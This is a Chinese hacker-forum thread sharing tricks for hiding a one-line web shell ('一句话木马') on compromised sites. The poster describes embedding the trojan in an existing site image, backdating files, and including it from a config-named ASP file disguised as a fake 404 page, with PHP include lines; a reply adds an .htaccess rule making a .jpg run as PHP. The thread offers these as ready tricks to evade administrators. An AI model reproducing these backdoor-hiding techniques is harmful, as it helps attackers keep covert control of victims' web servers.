我隐藏一句话木马的一些小技巧

蟹老板

拿asp举例，  先用copy命令创建一个图片一句话马，图片选用目标网站里面本来就有的图，便于伪装。 创建到图片文件夹里面，比如 uploadfiles/20140915130615.jpg  再修改一下文件日期。

然后在其他目录里面 创建一个asp文件，名字改成类似网站配置文件名， 也修改文件日期。

在文件里插入 这行代码。   <!--#include file="这里写图片马的路径"-->  
下面的是伪装页面代码。

[HTML] 纯文本查看 复制代码

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312"/>
<title>404 - 找不到文件或目录。</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;} 
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;} 
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} 
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>服务器错误</h1></div>
<div id="content">
 <div class="content-container"><fieldset>
  <h2>404 - 找不到文件或目录。</h2>
  <h3>您要查找的资源可能已被删除，已更改名称或者暂时不可用。</h3>
 </fieldset></div>
</div>
</body>
</html>

这样就比较隐蔽了。 asp外面看到是404，图片马外面看到的是正常图片。
可以蒙混过很多粗心的管理员。

蟹老板

图片可以替换网站原有的， 一句话可以选择变种的，难以辨别的。
#include file 可以试着插入网站原有文件，但不影响网站使用的。比如一些没用的asp文件里面。


php 的语法是

[AppleScript] 纯文本查看 复制代码

<?php require_once ("伪装马.jpg"); ?> 

或者
<?php
include('伪装马.jpg');
?>

这盐有点咸

你的后门有我的猥琐？
<FilesMatch "20151111.jpg">

SetHandler application/x-httpd-php

</FilesMatch>

蟹老板

这盐有点咸 发表于 2015-4-23 23:50
你的后门有我的猥琐？

哈哈， 我也是抛砖引玉嘛，把大家的奇巧淫技都收藏一下。

wilist

还是不错的哦，顶了

ljy07

还是不错的哦，顶了

Micah

感谢楼主的分享~

云游者

学习学习技术，加油！

Lucifer

还是不错的哦，顶了

Sty，涛

支持中国红客联盟(ihonker.org)